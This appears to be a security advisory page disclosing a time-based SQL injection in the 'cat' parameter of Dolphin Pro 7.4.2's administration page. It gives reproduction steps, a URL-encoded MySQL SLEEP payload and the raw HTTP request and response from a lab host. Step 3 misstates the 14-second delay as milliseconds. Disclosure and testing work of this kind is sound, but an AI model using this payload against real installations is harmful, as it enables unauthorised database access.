dolphin.prov7.4.2 SQL Injection in Admin Functionality

2025.03.25

Credit: Andrey Stoykov

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: SQL Injection in Admin Functionality - dolphin.prov7.4.2
# Date: 03/2025
# Exploit Author: Andrey Stoykov
# Version: 7.4.2
# Date: 03/2025
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2025/03/friday-fun-pentest-series-21-sql.html


SQL Injection in Admin Functionality:

Steps to Reproduce:

1. Login as admin user and visit the page of "
http://192.168.58.170/dolphinCMS/administration/index.php?cat="
2. Add the MySQL injection SLEEP payload to the "cat" value
3. Notice that the backend would delay the HTTP response for 14 miliseconds


%27%20and%20(select*from(select(sleep(14)))a)--%20


// HTTP GET Request

GET
/dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20
HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0)
Gecko/20100101 Firefox/137.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Thu, 20 Mar 2025 22:55:46 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55510

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

dolphin.prov7.4.2 SQL Injection in Admin Functionality

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

dolphin.prov7.4.2 SQL Injection in Admin Functionality

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.